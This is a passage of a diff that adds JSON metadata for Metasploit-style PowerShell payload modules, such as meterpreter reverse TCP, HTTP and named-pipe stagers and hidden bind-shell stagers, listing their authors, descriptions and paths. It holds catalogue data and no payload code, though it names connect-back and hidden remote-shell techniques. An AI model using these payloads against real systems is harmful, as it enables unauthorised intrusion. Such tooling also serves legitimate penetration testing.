over IPv6", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_named_pipe": { + "name": "Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_named_pipe" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_nonx_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_ord_tcp": { + "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + 
"spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_tcp": { + "name": "Powershell Exec, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_tcp_allports": { + "name": "Powershell Exec, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_tcp_dns": { + "name": "Powershell Exec, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + 
"Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + 
"ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support", + "fullname": 
"payload/cmd/windows/powershell/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_winhttp": { + "name": "Powershell Exec, Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": 
null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_winhttp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_winhttps": { + "name": "Powershell Exec, Windows Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_winhttps", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_winhttps" + }, + 
"payload_cmd/windows/powershell/metsvc_bind_tcp": { + "name": "Powershell Exec, Windows Meterpreter Service, Bind TCP", + "fullname": "payload/cmd/windows/powershell/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/metsvc_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/metsvc_reverse_tcp": { + "name": "Powershell Exec, Windows Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/cmd/windows/powershell/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": 
false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/metsvc_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_hidden_tcp": { + "name": "Powershell Exec, Hidden Bind TCP Stager", + "fullname": 
"payload/cmd/windows/powershell/patchupdllinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp": { + "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_named_pipe": { + "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", + 
"fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_nonx_tcp": { + "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_tcp": { + "name": "Powershell Exec, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from 
a command via PowerShell.\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_tcp_uuid", + "staged": true, + "stage_refname": 
"windows/patchupdllinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/patchupdllinject/find_tag": { + "name": "Powershell Exec, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/find_tag", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 
